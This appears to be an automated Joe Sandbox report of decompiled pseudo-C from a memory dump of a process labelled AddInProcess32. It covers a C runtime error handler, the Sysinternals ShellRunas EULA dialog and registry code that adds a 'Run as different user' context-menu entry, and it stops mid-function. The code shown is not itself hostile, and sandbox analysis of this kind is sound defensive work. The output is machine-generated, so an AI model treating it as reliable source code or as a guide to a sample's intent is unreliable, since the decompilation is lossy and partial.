                                              						_t40 = 0x4138d4 + _t38 * 8;
                                              						_t11 = WriteFile(_t45,  *_t40, E00408FE0( *_t40),  &_v4, 0);
                                              					}
                                              					L25:
                                              					return _t11;
                                              				}
                                              				_t11 = E0040B0DD(3);
                                              				_pop(_t34);
                                              				if(_t11 != 0 ||  *0x413000 != 1) {
                                              					if(_t30 == 0xfc) {
                                              						goto L25;
                                              					}
                                              					_t14 = E0040A659(_t11, _t37, 0x414548, 0x314, "Runtime Error!\n\nProgram: ");
                                              					_t49 = _t48 + 0xc;
                                              					if(_t14 != 0) {
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						E00405700(0x314, _t34, _t37, _t38);
                                              						_t49 = _t49 + 0x14;
                                              					}
                                              					 *0x414665 = 0;
                                              					if(GetModuleFileNameA(0, 0x414561, 0x104) == 0) {
                                              						_t26 = E0040A659(_t15, _t37, 0x414561, 0x2fb, "<program name unknown>");
                                              						_t49 = _t49 + 0xc;
                                              						if(_t26 != 0) {
                                              							_push(0);
                                              							_push(0);
                                              							_push(0);
                                              							_push(0);
                                              							_push(0);
                                              							E00405700(0x314, _t34, _t37, _t38);
                                              							_t49 = _t49 + 0x14;
                                              						}
                                              					}
                                              					_t16 = E00408FE0(0x414561);
                                              					_pop(_t35);
                                              					if(_t16 + 1 <= 0x3c) {
                                              						L16:
                                              						_t42 = 0;
                                              						goto L17;
                                              					} else {
                                              						_t23 = E00408FE0(0x414561) + 0x414526;
                                              						_t35 = 0x41485c - E00408FE0(0x414561) + 0x414526;
                                              						_t24 = E0040A5A6(_t37, _t23, 0x41485c - E00408FE0(0x414561) + 0x414526, "...", 3);
                                              						_t49 = _t49 + 0x14;
                                              						if(_t24 == 0) {
                                              							goto L16;
                                              						}
                                              						_t42 = 0;
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						_push(0);
                                              						E00405700(0x314, _t35, _t37, _t38);
                                              						_t49 = _t49 + 0x14;
                                              						L17:
                                              						_t18 = E0040A4E5(_t37, 0x414548, 0x314, "\n\n");
                                              						_t50 = _t49 + 0xc;
                                              						if(_t18 != 0) {
                                              							_push(_t42);
                                              							_push(_t42);
                                              							_push(_t42);
                                              							_push(_t42);
                                              							_push(_t42);
                                              							E00405700(0x314, _t35, _t37, _t38);
                                              							_t50 = _t50 + 0x14;
                                              						}
                                              						_t19 = E0040A4E5(_t37, 0x414548, 0x314,  *(0x4138d4 + _t38 * 8));
                                              						_t51 = _t50 + 0xc;
                                              						if(_t19 != 0) {
                                              							_push(_t42);
                                              							_push(_t42);
                                              							_push(_t42);
                                              							_push(_t42);
                                              							_push(_t42);
                                              							E00405700(0x314, _t35, _t37, _t38);
                                              							_t51 = _t51 + 0x14;
                                              						}
                                              						_t11 = E0040AF20(_t37, 0x414548, "Microsoft Visual C++ Runtime Library", 0x12010);
                                              						goto L25;
                                              					}
                                              				} else {
                                              					goto L22;
                                              				}
                                              			}


























                                              0x00406ce5
                                              0x00406ce7
                                              0x00406cef
                                              0x00406cf1
                                              0x00406cfa
                                              0x00406cfe
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00406cfe
                                              0x00406d03
                                              0x00406e84
                                              0x00406e84
                                              0x00406d15
                                              0x00406e4c
                                              0x00406e4e
                                              0x00406e54
                                              0x00406e58
                                              0x00406e66
                                              0x00406e79
                                              0x00406e79
                                              0x00406e7f
                                              0x00000000
                                              0x00406e7f
                                              0x00406d1d
                                              0x00406d24
                                              0x00406d25
                                              0x00406d3a
                                              0x00000000
                                              0x00000000
                                              0x00406d51
                                              0x00406d56
                                              0x00406d5b
                                              0x00406d5d
                                              0x00406d5e
                                              0x00406d5f
                                              0x00406d60
                                              0x00406d61
                                              0x00406d62
                                              0x00406d67
                                              0x00406d67
                                              0x00406d77
                                              0x00406d86
                                              0x00406d93
                                              0x00406d98
                                              0x00406d9d
                                              0x00406da1
                                              0x00406da2
                                              0x00406da3
                                              0x00406da4
                                              0x00406da5
                                              0x00406da6
                                              0x00406dab
                                              0x00406dab
                                              0x00406d9d
                                              0x00406daf
                                              0x00406db8
                                              0x00406db9
                                              0x00406df3
                                              0x00406df3
                                              0x00000000
                                              0x00406dbb
                                              0x00406dc4
                                              0x00406dd2
                                              0x00406dd6
                                              0x00406ddb
                                              0x00406de0
                                              0x00000000
                                              0x00000000
                                              0x00406de2
                                              0x00406de4
                                              0x00406de5
                                              0x00406de6
                                              0x00406de7
                                              0x00406de8
                                              0x00406de9
                                              0x00406dee
                                              0x00406df5
                                              0x00406dfc
                                              0x00406e01
                                              0x00406e06
                                              0x00406e08
                                              0x00406e09
                                              0x00406e0a
                                              0x00406e0b
                                              0x00406e0c
                                              0x00406e0d
                                              0x00406e12
                                              0x00406e12
                                              0x00406e1e
                                              0x00406e23
                                              0x00406e28
                                              0x00406e2a
                                              0x00406e2b
                                              0x00406e2c
                                              0x00406e2d
                                              0x00406e2e
                                              0x00406e2f
                                              0x00406e34
                                              0x00406e34
                                              0x00406e42
                                              0x00000000
                                              0x00406e47
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              • _strcpy_s.LIBCMT ref: 00406D51
                                              • __invoke_watson.LIBCMT ref: 00406D62
                                              • GetModuleFileNameA.KERNEL32(00000000,00414561,00000104), ref: 00406D7E
                                              • _strcpy_s.LIBCMT ref: 00406D93
                                              • __invoke_watson.LIBCMT ref: 00406DA6
                                              • _strlen.LIBCMT ref: 00406DAF
                                              • _strlen.LIBCMT ref: 00406DBC
                                              • __invoke_watson.LIBCMT ref: 00406DE9
                                              • _strcat_s.LIBCMT ref: 00406DFC
                                              • __invoke_watson.LIBCMT ref: 00406E0D
                                              • _strcat_s.LIBCMT ref: 00406E1E
                                              • __invoke_watson.LIBCMT ref: 00406E2F
                                              • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77D44620,00000003,00406EB1,000000FC,00403572,?,?,00000000,?,00401E38,00000000,?), ref: 00406E4E
                                              • _strlen.LIBCMT ref: 00406E6F
                                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00401E38,00000000,?,?), ref: 00406E79
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                                              • String ID: ...$<program name unknown>$HEA$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $\HA$aEA
                                              • API String ID: 1879448924-3572076021
                                              • Opcode ID: d3af22cc10ca9b44eb9083e57a25194163f1f7ec8eb41c9ad0b68adc3b984521
                                              • Instruction ID: b7283139e289806ab696c21597f2b912ea31a9b8ad5217b72df3c15dadb4aa87
                                              • Opcode Fuzzy Hash: d3af22cc10ca9b44eb9083e57a25194163f1f7ec8eb41c9ad0b68adc3b984521
                                              • Instruction Fuzzy Hash: 133118B6A003116AE6203375DC0AF6B364D9B61759F16013BFD4AB12C3EE7D892581FE
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 86%
                                              			E00401470(char _a4) {
                                              				int _v0;
                                              				signed int _v4;
                                              				short _v524;
                                              				int _v528;
                                              				void* _v532;
                                              				void* __ebx;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t76;
                                              				signed int _t85;
                                              				signed short* _t88;
                                              				signed short* _t89;
                                              				signed int _t91;
                                              				short* _t92;
                                              				short* _t93;
                                              				void* _t94;
                                              				signed int _t97;
                                              				short* _t98;
                                              				short* _t99;
                                              				void* _t100;
                                              				signed int _t103;
                                              				short* _t104;
                                              				short* _t105;
                                              				void* _t106;
                                              				signed int _t109;
                                              				short* _t110;
                                              				short* _t111;
                                              				void* _t112;
                                              				signed int _t115;
                                              				signed short* _t116;
                                              				signed short* _t117;
                                              				void* _t122;
                                              				signed int _t128;
                                              				signed int _t129;
                                              				signed short* _t130;
                                              				signed short* _t132;
                                              				signed short* _t133;
                                              				signed short* _t134;
                                              				void* _t136;
                                              				signed int _t137;
                                              				void* _t142;
                                              				void* _t144;
                                              				void* _t146;
                                              				void* _t148;
                                              				void* _t150;
                                              				void* _t152;
                                              				void* _t153;
                                              				void* _t154;
                                              				int* _t157;
                                              				int* _t158;
                                              				int* _t159;
                                              				int* _t160;
                                              				int* _t161;
                                              				signed int _t162;
                                              				signed int _t163;
                                              				signed int _t164;
                                              				signed int _t165;
                                              				signed int _t166;
                                              				void* _t168;
                                              				void* _t170;
                                              				void* _t171;
                                              				int _t173;
                                              				signed int _t177;
                                              				signed int _t178;
                                              
                                              				_t177 =  &_v532;
                                              				_t76 =  *0x413004; // 0x98fc836b
                                              				_v4 = _t76 ^ _t177;
                                              				_t173 = 0;
                                              				_v532 = 0;
                                              				E00403227( &_v524,  &_v524, L"Software\\Sysinternals\\%s", L"ShellRunas - Sysinternals: www.sysinternals.com");
                                              				_t178 = _t177 + 0xc;
                                              				if(RegCreateKeyW(0x80000001,  &_v524,  &_v532) == 0) {
                                              					_v528 = 4;
                                              					RegQueryValueExW(_v532, L"EulaAccepted", 0, 0,  &_a4,  &_v528);
                                              				}
                                              				if(_a4 != _t173) {
                                              					L20:
                                              					RegSetValueExW(_v532, L"EulaAccepted", _t173, 4,  &_a4, 4);
                                              				} else {
                                              					_push(_t170);
                                              					_t171 = LocalAlloc(0x40, 0x3e8);
                                              					_t11 = _t171 + 0x12; // 0x12
                                              					_t157 = _t11;
                                              					LoadLibraryW(L"Riched32.dll");
                                              					 *_t171 = 0x80c808d0;
                                              					 *(_t171 + 0xa) = _t173;
                                              					 *(_t171 + 0xc) = _t173;
                                              					 *((short*)(_t171 + 0xe)) = 0x138;
                                              					 *((short*)(_t171 + 0x10)) = 0xb4;
                                              					 *(_t171 + 8) = _t173;
                                              					 *_t157 = _t173;
                                              					_t158 =  &(_t157[0]);
                                              					 *_t158 = _t173;
                                              					_t159 =  &(_t158[0]);
                                              					_t88 = L"License Agreement";
                                              					_t142 = _t159 - _t88;
                                              					do {
                                              						_t128 =  *_t88 & 0x0000ffff;
                                              						 *(_t142 + _t88) = _t128;
                                              						_t88 =  &(_t88[1]);
                                              					} while (_t128 != _t173);
                                              					_t160 =  &(_t159[9]);
                                              					 *_t160 = 8;
                                              					_t161 =  &(_t160[0]);
                                              					_t89 = L"MS Shell Dlg";
                                              					_t144 = _t161 - _t89;
                                              					do {
                                              						_t129 =  *_t89 & 0x0000ffff;
                                              						 *(_t144 + _t89) = _t129;
                                              						_t89 =  &(_t89[1]);
                                              					} while (_t129 != _t173);
                                              					_t19 =  &(_t161[7]); // 0x5
                                              					_t91 = _t19 & 0xfffffffc;
                                              					 *((short*)(_t91 + 8)) = 7;
                                              					 *((short*)(_t91 + 0xa)) = 3;
                                              					 *((short*)(_t91 + 0xc)) = 0x12a;
                                              					 *((short*)(_t91 + 0x10)) = 0x1f6;
                                              					 *_t91 = 0x50000000;
                                              					_push(_t122);
                                              					 *((short*)(_t91 + 0xe)) = 0xe;
                                              					_t92 = _t91 + 0x12;
                                              					 *_t92 = 0xffff;
                                              					_t93 = _t92 + 2;
                                              					 *_t93 = 0x82;
                                              					_t94 = _t93 + 2;
                                              					_t130 = L"You can also use the /accepteula command-line switch to accept the EULA.";
                                              					_t146 = _t94 - _t130;
                                              					do {
                                              						_t162 =  *_t130 & 0x0000ffff;
                                              						 *(_t146 + _t130) = _t162;
                                              						_t130 =  &(_t130[1]);
                                              					} while (_t162 != _t173);
                                              					 *(_t94 + 0x92) = _t173;
                                              					_t97 = _t94 + 0x97 & 0xfffffffc;
                                              					 *(_t171 + 8) =  *(_t171 + 8) + 1;
                                              					 *((short*)(_t97 + 0x10)) = 1;
                                              					 *((short*)(_t97 + 8)) = 0xc9;
                                              					 *((short*)(_t97 + 0xa)) = 0x9f;
                                              					 *((short*)(_t97 + 0xe)) = 0xe;
                                              					 *_t97 = 0x50010000;
                                              					 *((short*)(_t97 + 0xc)) = 0x32;
                                              					_t98 = _t97 + 0x12;
                                              					 *_t98 = 0xffff;
                                              					_t99 = _t98 + 2;
                                              					 *_t99 = 0x80;
                                              					_t100 = _t99 + 2;
                                              					_t132 = L"&Agree";
                                              					_t148 = _t100 - _t132;
                                              					do {
                                              						_t163 =  *_t132 & 0x0000ffff;
                                              						 *(_t148 + _t132) = _t163;
                                              						_t132 =  &(_t132[1]);
                                              					} while (_t163 != 0);
                                              					 *(_t100 + 0xe) = _t163;
                                              					 *(_t171 + 8) =  *(_t171 + 8) + 1;
                                              					_t103 = _t100 + 0x13 & 0xfffffffc;
                                              					 *((short*)(_t103 + 8)) = 0xff;
                                              					 *((short*)(_t103 + 0xa)) = 0x9f;
                                              					 *((short*)(_t103 + 0xc)) = 0x32;
                                              					 *((short*)(_t103 + 0xe)) = 0xe;
                                              					 *((short*)(_t103 + 0x10)) = 2;
                                              					 *_t103 = 0x50010000;
                                              					_t104 = _t103 + 0x12;
                                              					 *_t104 = 0xffff;
                                              					_t105 = _t104 + 2;
                                              					 *_t105 = 0x80;
                                              					_t106 = _t105 + 2;
                                              					_t133 = L"&Decline";
                                              					_t150 = _t106 - _t133;
                                              					do {
                                              						_t164 =  *_t133 & 0x0000ffff;
                                              						 *(_t150 + _t133) = _t164;
                                              						_t133 =  &(_t133[1]);
                                              					} while (_t164 != 0);
                                              					 *(_t106 + 0x12) = _t164;
                                              					 *(_t171 + 8) =  *(_t171 + 8) + 1;
                                              					_t109 = _t106 + 0x17 & 0xfffffffc;
                                              					 *((short*)(_t109 + 8)) = 7;
                                              					 *((short*)(_t109 + 0xa)) = 0x9f;
                                              					 *((short*)(_t109 + 0xc)) = 0x32;
                                              					 *((short*)(_t109 + 0xe)) = 0xe;
                                              					 *((short*)(_t109 + 0x10)) = 0x1f5;
                                              					 *_t109 = 0x50010000;
                                              					_t110 = _t109 + 0x12;
                                              					 *_t110 = 0xffff;
                                              					_t111 = _t110 + 2;
                                              					 *_t111 = 0x80;
                                              					_t112 = _t111 + 2;
                                              					_t134 = L"&Print";
                                              					_t152 = _t112 - _t134;
                                              					do {
                                              						_t165 =  *_t134 & 0x0000ffff;
                                              						 *(_t152 + _t134) = _t165;
                                              						_t134 =  &(_t134[1]);
                                              					} while (_t165 != 0);
                                              					 *(_t112 + 0xe) = _t165;
                                              					_t115 = _t112 + 0x13 & 0xfffffffc;
                                              					 *(_t171 + 8) =  *(_t171 + 8) + 1;
                                              					_t56 = _t115 + 0x12; // -249
                                              					_t153 = _t56;
                                              					 *((short*)(_t115 + 0xa)) = 0xe;
                                              					 *((short*)(_t115 + 8)) = 7;
                                              					 *((short*)(_t115 + 0xc)) = 0x12a;
                                              					 *((short*)(_t115 + 0xe)) = 0x8c;
                                              					 *((short*)(_t115 + 0x10)) = 0x1f4;
                                              					 *_t115 = 0x50a11844;
                                              					_t116 = L"RICHEDIT";
                                              					_t136 = _t153 - _t116;
                                              					_pop(_t122);
                                              					do {
                                              						_t166 =  *_t116 & 0x0000ffff;
                                              						 *(_t136 + _t116) = _t166;
                                              						_t116 =  &(_t116[1]);
                                              					} while (_t166 != 0);
                                              					_t154 = _t153 + 0x12;
                                              					_t117 = L"&Decline";
                                              					_t168 = _t154 - _t117;
                                              					do {
                                              						_t137 =  *_t117 & 0x0000ffff;
                                              						 *(_t168 + _t117) = _t137;
                                              						_t117 =  &(_t117[1]);
                                              					} while (_t137 != 0);
                                              					 *(_t154 + 0x12) = _t137;
                                              					 *(_t171 + 8) =  *(_t171 + 8) + 1;
                                              					_v0 = DialogBoxIndirectParamW(0, _t171, 0, E00401310, L"ShellRunas - Sysinternals: www.sysinternals.com");
                                              					LocalFree(_t171);
                                              					_t173 = 0;
                                              					_pop(_t170);
                                              					if(_v0 != 0) {
                                              						goto L20;
                                              					}
                                              				}
                                              				RegCloseKey(_v532);
                                              				_t85 = 0 | _a4 != _t173;
                                              				E0040318A(_t85, _t122, _v4 ^ _t178, _t170);
                                              				return _t85;
                                              			}



































































                                              0x00401470
                                              0x00401476
                                              0x0040147d
                                              0x00401493
                                              0x00401496
                                              0x0040149a
                                              0x0040149f
                                              0x004014b9
                                              0x004014d4
                                              0x004014dc
                                              0x004014dc
                                              0x004014e9
                                              0x004017a7
                                              0x004017be
                                              0x004014ef
                                              0x004014ef
                                              0x004014fe
                                              0x00401505
                                              0x00401505
                                              0x00401508
                                              0x0040150e
                                              0x00401514
                                              0x00401518
                                              0x0040151c
                                              0x00401522
                                              0x00401528
                                              0x0040152c
                                              0x0040152f
                                              0x00401532
                                              0x00401535
                                              0x00401538
                                              0x0040153f
                                              0x00401541
                                              0x00401541
                                              0x00401544
                                              0x00401548
                                              0x0040154b
                                              0x00401550
                                              0x00401553
                                              0x00401558
                                              0x0040155b
                                              0x00401562
                                              0x00401564
                                              0x00401564
                                              0x00401567
                                              0x0040156b
                                              0x0040156e
                                              0x00401573
                                              0x00401576
                                              0x00401579
                                              0x0040157f
                                              0x00401585
                                              0x0040158b
                                              0x00401591
                                              0x00401597
                                              0x0040159d
                                              0x004015a1
                                              0x004015a4
                                              0x004015a9
                                              0x004015ac
                                              0x004015b1
                                              0x004015b4
                                              0x004015bb
                                              0x004015c0
                                              0x004015c0
                                              0x004015c3
                                              0x004015c7
                                              0x004015ca
                                              0x004015cf
                                              0x004015de
                                              0x004015e6
                                              0x004015ea
                                              0x004015ee
                                              0x004015f4
                                              0x004015fa
                                              0x004015fe
                                              0x00401609
                                              0x0040160d
                                              0x00401610
                                              0x00401615
                                              0x00401618
                                              0x0040161d
                                              0x00401620
                                              0x00401627
                                              0x00401630
                                              0x00401630
                                              0x00401633
                                              0x00401637
                                              0x0040163a
                                              0x0040163f
                                              0x00401643
                                              0x0040164d
                                              0x00401650
                                              0x00401656
                                              0x0040165c
                                              0x00401660
                                              0x00401664
                                              0x0040166a
                                              0x00401670
                                              0x00401673
                                              0x00401678
                                              0x0040167b
                                              0x00401680
                                              0x00401683
                                              0x0040168a
                                              0x00401690
                                              0x00401690
                                              0x00401693
                                              0x00401697
                                              0x0040169a
                                              0x0040169f
                                              0x004016a3
                                              0x004016ae
                                              0x004016b1
                                              0x004016b7
                                              0x004016bd
                                              0x004016c1
                                              0x004016c5
                                              0x004016cb
                                              0x004016d1
                                              0x004016d4
                                              0x004016d9
                                              0x004016dc
                                              0x004016e1
                                              0x004016e4
                                              0x004016eb
                                              0x004016f0
                                              0x004016f0
                                              0x004016f3
                                              0x004016f7
                                              0x004016fa
                                              0x004016ff
                                              0x00401708
                                              0x00401710
                                              0x00401714
                                              0x00401714
                                              0x00401717
                                              0x0040171b
                                              0x00401721
                                              0x00401727
                                              0x0040172d
                                              0x00401733
                                              0x00401739
                                              0x00401740
                                              0x00401742
                                              0x00401743
                                              0x00401743
                                              0x00401746
                                              0x0040174a
                                              0x0040174d
                                              0x00401752
                                              0x00401755
                                              0x0040175c
                                              0x00401760
                                              0x00401760
                                              0x00401763
                                              0x00401767
                                              0x0040176a
                                              0x0040177c
                                              0x00401780
                                              0x0040178d
                                              0x00401794
                                              0x0040179a
                                              0x004017a4
                                              0x004017a5
                                              0x00000000
                                              0x00000000
                                              0x004017a5
                                              0x004017c9
                                              0x004017e0
                                              0x004017e5
                                              0x004017f0

                                              APIs
                                              • __swprintf.LIBCMT ref: 0040149A
                                              • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 004014B1
                                              • RegQueryValueExW.ADVAPI32 ref: 004014DC
                                              • LocalAlloc.KERNEL32(00000040,000003E8,?,?,?,?,00000000), ref: 004014F8
                                              • LoadLibraryW.KERNEL32(Riched32.dll,?,?,?,00000000), ref: 00401508
                                              • DialogBoxIndirectParamW.USER32 ref: 00401786
                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000), ref: 00401794
                                              • RegSetValueExW.ADVAPI32(?,EulaAccepted,00000000,00000004,?,00000004,?,?,00000000), ref: 004017BE
                                              • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004017C9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: LocalValue$AllocCloseCreateDialogFreeIndirectLibraryLoadParamQuery__swprintf
                                              • String ID: &Agree$&Decline$&Print$EulaAccepted$License Agreement$MS Shell Dlg$RICHEDIT$Riched32.dll$ShellRunas - Sysinternals: www.sysinternals.com$Software\Sysinternals\%s$You can also use the /accepteula command-line switch to accept the EULA.
                                              • API String ID: 1839599301-707968945
                                              • Opcode ID: f4e69aa77bff61b704e8fbccd0d93f2c3052f5bef0e29b2b67b4d8038d72d3e8
                                              • Instruction ID: 154b2d0257e82f6b0cd4e7c6326ce2309e60fd29fcbd71df3831e51aaf4186b5
                                              • Opcode Fuzzy Hash: f4e69aa77bff61b704e8fbccd0d93f2c3052f5bef0e29b2b67b4d8038d72d3e8
                                              • Instruction Fuzzy Hash: C7919CB29603008BC3218F24C81AB92B3B0FF95314F5A955DE5899F3B2F7B8C585C75A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 63%
                                              			E004019F0(void* __ebx, short* __ecx, short* _a4) {
                                              				signed int _v4;
                                              				short _v1044;
                                              				short _v1564;
                                              				void* _v1568;
                                              				void* _v1572;
                                              				void* _v1576;
                                              				void* _v1580;
                                              				void* _v1584;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t28;
                                              				int _t31;
                                              				short* _t37;
                                              				int* _t38;
                                              				struct HINSTANCE__* _t42;
                                              				intOrPtr* _t47;
                                              				void* _t54;
                                              				intOrPtr _t63;
                                              				void* _t74;
                                              				short* _t80;
                                              				void* _t81;
                                              				int _t82;
                                              				signed int _t86;
                                              
                                              				_t54 = __ebx;
                                              				_t86 =  &_v1584;
                                              				_t28 =  *0x413004; // 0x98fc836b
                                              				_v4 = _t28 ^ _t86;
                                              				_t80 = __ecx;
                                              				_t31 = RegCreateKeyExW(0x80000001, _a4, 0, 0, 0, 4, 0,  &_v1576, 0);
                                              				if(_t31 == 0) {
                                              					_t82 = RegCreateKeyExW(_v1576, _t80, _t31, _t31, _t31, 4, _t31,  &_v1584, _t31);
                                              					if(_t82 == 0) {
                                              						_t82 = RegCreateKeyExW(_v1584, L"Shell", 0, 0, 0, 4, 0,  &_v1572, 0);
                                              						if(_t82 == 0) {
                                              							_t37 = L"Run as different user (netonly)...";
                                              							if(__ebx == 0) {
                                              								_t37 = L"Run as different user...";
                                              							}
                                              							_t38 = RegCreateKeyExW(_v1572, _t37, 0, 0, 0, 4, 0,  &_v1568, 0);
                                              							_t82 = _t38;
                                              							if(_t82 == 0) {
                                              								_t42 = RegCreateKeyExW(_v1568, L"Command", _t82, _t82, _t82, 6, _t82,  &_v1580, _t38);
                                              								_t82 = _t42;
                                              								if(_t82 == 0) {
                                              									GetModuleFileNameW(_t42,  &_v1564, 0x104);
                                              									if(_t54 == 0) {
                                              										_push( &_v1564);
                                              										_push(L"\"%s\" \"%%1\" %%*");
                                              										_push(0x208);
                                              										_push( &_v1044);
                                              									} else {
                                              										_push( &_v1564);
                                              										_push(L"\"%s\" /netonly \"%%1\" %%*");
                                              										_push(0x208);
                                              										_push( &_v1044);
                                              									}
                                              									E004032BD();
                                              									_t47 =  &_v1044;
                                              									_t86 = _t86 + 0x10;
                                              									_t74 = _t47 + 2;
                                              									do {
                                              										_t63 =  *_t47;
                                              										_t47 = _t47 + 2;
                                              									} while (_t63 != 0);
                                              									_t82 = RegSetValueW(_v1580, 0, 1,  &_v1044, (_t47 - _t74 >> 1) + (_t47 - _t74 >> 1));
                                              									RegCloseKey(_v1580);
                                              								}
                                              								RegCloseKey(_v1568);
                                              							}
                                              							RegCloseKey(_v1572);
                                              						}
                                              						RegCloseKey(_v1584);
                                              					}
                                              					RegCloseKey(_v1576);
                                              					_t31 = _t82;
                                              				}
                                              				_pop(_t81);
                                              				E0040318A(_t31, _t54, _v4 ^ _t86, _t81);
                                              				return _t31;
                                              			}


























                                              0x004019f0
                                              0x004019f0
                                              0x004019f6
                                              0x004019fd
                                              0x00401a15
                                              0x00401a2c
                                              0x00401a30
                                              0x00401a51
                                              0x00401a55
                                              0x00401a78
                                              0x00401a7c
                                              0x00401a84
                                              0x00401a89
                                              0x00401a8b
                                              0x00401a8b
                                              0x00401aa7
                                              0x00401aa9
                                              0x00401aad
                                              0x00401ac9
                                              0x00401acb
                                              0x00401acf
                                              0x00401ae0
                                              0x00401ae8
                                              0x00401b07
                                              0x00401b08
                                              0x00401b0d
                                              0x00401b19
                                              0x00401aea
                                              0x00401aee
                                              0x00401aef
                                              0x00401af4
                                              0x00401b00
                                              0x00401b00
                                              0x00401b1a
                                              0x00401b1f
                                              0x00401b26
                                              0x00401b29
                                              0x00401b30
                                              0x00401b30
                                              0x00401b33
                                              0x00401b36
                                              0x00401b5f
                                              0x00401b61
                                              0x00401b61
                                              0x00401b68
                                              0x00401b68
                                              0x00401b6f
                                              0x00401b6f
                                              0x00401b76
                                              0x00401b76
                                              0x00401b7d
                                              0x00401b7f
                                              0x00401b81
                                              0x00401b8a
                                              0x00401b8d
                                              0x00401b98

                                              APIs
                                              • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000004,00000000,?,00000000,?), ref: 00401A2C
                                              • RegCreateKeyExW.ADVAPI32(?,.exe,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A49
                                              • RegCreateKeyExW.ADVAPI32(?,Shell,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A76
                                              • RegCreateKeyExW.ADVAPI32(?,Run as different user (netonly)...,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401AA7
                                              • RegCreateKeyExW.ADVAPI32(?,Command,00000000,00000000,00000000,00000006,00000000,?,00000000), ref: 00401AC9
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401AE0
                                              • _swprintf.LIBCMT ref: 00401B1A
                                              • RegSetValueW.ADVAPI32(?,00000000,00000001,?), ref: 00401B54
                                              • RegCloseKey.ADVAPI32(?), ref: 00401B61
                                              • RegCloseKey.ADVAPI32(?), ref: 00401B68
                                              • RegCloseKey.ADVAPI32(?), ref: 00401B6F
                                              • RegCloseKey.ADVAPI32(?), ref: 00401B76
                                              • RegCloseKey.ADVAPI32(?), ref: 00401B7D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: CloseCreate$FileModuleNameValue_swprintf
                                              • String ID: "%s" "%%1" %%*$"%s" /netonly "%%1" %%*$.exe$Command$Run as different user (netonly)...$Run as different user...$Shell
                                              • API String ID: 2816765105-3583415818
                                              • Opcode ID: fd094dcd363d27c0bf250ac2475080b10ccc28c413ec764f82221b39573ebeb1
                                              • Instruction ID: 96684db5b3ddf41ef19364bd1cce9cce62b50f6402ace901a6fc09d749ff9c79
                                              • Opcode Fuzzy Hash: fd094dcd363d27c0bf250ac2475080b10ccc28c413ec764f82221b39573ebeb1
                                              • Instruction Fuzzy Hash: 6A416E726443017BE320DB64CC46FABB7ACABC8B54F40491DB744AB2D0DAB4F90487A9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 98%
                                              			E02B51E51(void* __ebx, WCHAR* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                                              				signed int _v8;
                                              				short _v136;
                                              				short _v392;
                                              				short _v648;
                                              				short _v1160;
                                              				short _v5328;
                                              				char _v9496;
                                              				long _v9500;
                                              				void* _v9504;
                                              				long _v9508;
                                              				void _v9512;
                                              				long _v9516;
                                              				long _v9520;
                                              				intOrPtr _v9532;
                                              				WCHAR* _v9536;
                                              				intOrPtr _v9540;
                                              				WCHAR* _v9544;
                                              				intOrPtr _v9548;
                                              				WCHAR* _v9552;
                                              				short _v9556;
                                              				intOrPtr _v9560;
                                              				WCHAR* _v9564;
                                              				intOrPtr _v9568;
                                              				void* _v9580;
                                              				signed int _t63;
                                              				void* _t73;
                                              				void* _t74;
                                              				void* _t81;
                                              				LPCWSTR* _t86;
                                              				long _t100;
                                              				intOrPtr* _t106;
                                              				intOrPtr _t112;
                                              				WCHAR* _t119;
                                              				WCHAR* _t123;
                                              				void* _t125;
                                              				void* _t127;
                                              				void* _t130;
                                              				WCHAR* _t132;
                                              				signed int _t136;
                                              
                                              				E02B53F00();
                                              				_t63 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t63 ^ _t136;
                                              				_t106 = _a4;
                                              				_t132 = __ecx;
                                              				_v9504 = __edx;
                                              				_t125 = 0x3c;
                                              				_v1160 = 0;
                                              				_v648 = 0;
                                              				_v392 = 0;
                                              				_v9496 = 0;
                                              				_v5328 = 0;
                                              				E02B52CE7(0,  &_v9580, _t125);
                                              				_v9580 = _t125;
                                              				_v9564 =  &_v1160;
                                              				_v9552 =  &_v648;
                                              				_v9544 =  &_v392;
